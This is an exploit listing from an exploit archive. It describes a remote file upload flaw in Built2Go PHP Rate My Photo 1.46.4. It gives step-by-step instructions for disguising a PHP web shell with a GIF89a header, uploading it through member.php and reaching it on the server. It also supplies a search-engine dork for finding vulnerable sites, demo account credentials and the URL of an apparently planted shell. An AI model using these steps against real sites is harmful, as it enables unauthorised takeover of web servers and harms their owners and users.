Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability

2009-01-02T00:00:00
ID 1337DAY-ID-4591
Type zdt
Reporter ZoRLu
Modified 2009-01-02T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability
==================================================================


[~] Built2Go PHP Rate My Photo v1.46.4 RFU
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu 
[~]
[~] Date: 22.11.2008
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] dork mu :) "My Photo v1.46.4 © Big Resources" ( for yahoo )
[~]
[~] onemli N0TT: arkadaslar hepimiz biliyoruz ki arama motoru yalnIzca google deil 
[~]
[~] bide yahoo yu deneyin sonra hic site yok dersiniz xD
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

first register to site 

you add this code your shell to head 

GIF89a; 

example your_shell.php:

GIF89a;
<?

...

...

...

?>

and save your_sheell.php

after go member.php

select your shell.php and your shell here:

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp:

demo:

http://demos.built2go.com/rate%20my%20photo/1/

login:

http://demos.built2go.com/rate%20my%20photo/1/member.php

user: salla

pass: salla1

shell:

http://demos.built2go.com/rate%20my%20photo/1/pictures/418_2009-01-0204-11-57.php



#  0day.today [2018-01-05]  #